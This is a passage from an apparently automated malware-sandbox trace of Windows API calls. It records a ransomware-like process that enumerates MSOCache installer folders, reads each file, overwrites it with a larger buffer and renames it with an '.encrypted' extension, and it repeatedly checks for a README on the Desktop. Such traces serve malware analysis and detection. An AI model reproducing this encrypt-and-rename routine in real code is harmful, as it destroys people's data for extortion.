hFindFile=0x94eeeb0 | out: hFindFile=0x94eeeb0) returned 1 [0180.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0180.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0180.496] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0180.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0180.496] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0180.497] GetFileType (hFile=0x2d8) returned 0x1 [0180.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0180.497] GetFileType (hFile=0x2d8) returned 0x1 [0180.497] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x978 [0180.497] ReadFile (in: hFile=0x2d8, lpBuffer=0x23c5cac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x23c5cac*, lpNumberOfBytesRead=0x2ee7d4*=0x978, lpOverlapped=0x0) returned 1 [0180.506] CloseHandle (hObject=0x2d8) returned 1 [0180.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0180.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0180.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0180.522] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0180.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0180.522] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0180.523] GetFileType (hFile=0x2d8) returned 0x1 [0180.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0180.523] GetFileType (hFile=0x2d8) returned 0x1 [0180.523] WriteFile (in: hFile=0x2d8, lpBuffer=0x2416c38*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x2416c38*, lpNumberOfBytesWritten=0x2ee798*=0x980, lpOverlapped=0x0) returned 1 [0180.524] CloseHandle (hObject=0x2d8) returned 1 [0180.525] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0180.525] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0180.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0180.525] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x5145eba0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x980)) returned 1 [0180.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0180.525] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0180.528] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpFilePart=0x0) returned 0x49 [0180.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0180.528] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0180.528] GetFileType (hFile=0x2d8) returned 0x1 [0180.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0180.528] GetFileType (hFile=0x2d8) returned 0x1 [0180.528] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x29c6dbd [0180.882] ReadFile (in: hFile=0x2d8, lpBuffer=0x1a2f1018, nNumberOfBytesToRead=0x29c6dbd, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x1a2f1018*, lpNumberOfBytesRead=0x2ee7d4*=0x29c6dbd, lpOverlapped=0x0) returned 1 [0184.484] CloseHandle (hObject=0x2d8) returned 1 [0188.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0188.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0188.593] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0188.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0188.593] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpFilePart=0x0) returned 0x49 [0188.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0188.593] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0188.598] GetFileType (hFile=0x2d8) returned 0x1 [0188.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0188.598] GetFileType (hFile=0x2d8) returned 0x1 [0188.598] WriteFile (in: hFile=0x2d8, lpBuffer=0x15551018*, nNumberOfBytesToWrite=0x29c6dc0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x15551018*, lpNumberOfBytesWritten=0x2ee7c4*=0x29c6dc0, lpOverlapped=0x0) returned 1 [0189.830] CloseHandle (hObject=0x2d8) returned 1 [0190.156] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpFilePart=0x0) returned 0x49 [0190.156] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.encrypted", lpFilePart=0x0) returned 0x53 [0190.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0190.157] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x56fb77e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dc0)) returned 1 [0190.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0190.157] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.encrypted")) returned 1 [0190.159] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0190.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0190.159] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0190.159] GetFileType (hFile=0x2d8) returned 0x1 [0190.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0190.159] GetFileType (hFile=0x2d8) returned 0x1 [0190.159] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x708 [0190.159] ReadFile (in: hFile=0x2d8, lpBuffer=0x224a080, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x224a080*, lpNumberOfBytesRead=0x2ee7d4*=0x708, lpOverlapped=0x0) returned 1 [0190.161] CloseHandle (hObject=0x2d8) returned 1 [0190.206] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0190.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0190.206] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0190.206] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0190.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0190.206] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d8 [0190.207] GetFileType (hFile=0x2d8) returned 0x1 [0190.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0190.207] GetFileType (hFile=0x2d8) returned 0x1 [0190.207] WriteFile (in: hFile=0x2d8, lpBuffer=0x229a9a0*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x229a9a0*, lpNumberOfBytesWritten=0x2ee798*=0x710, lpOverlapped=0x0) returned 1 [0190.208] CloseHandle (hObject=0x2d8) returned 1 [0190.211] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpFilePart=0x0) returned 0x4a [0190.211] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.encrypted", lpFilePart=0x0) returned 0x54 [0190.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0190.211] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x57029c00, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x710)) returned 1 [0190.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0190.212] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.encrypted")) returned 1 [0190.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0190.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0190.213] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0190.213] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ef030 [0190.215] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.216] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0190.216] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0190.216] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0190.216] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0190.216] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0190.216] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0190.216] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0190.216] FindClose (in: hFindFile=0x94ef030 | out: hFindFile=0x94ef030) returned 1 [0190.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0190.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0190.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0190.217] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0190.217] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0190.218] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ef030 [0190.219] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.219] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0190.219] FindNextFileW (in: hFindFile=0x94ef030, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 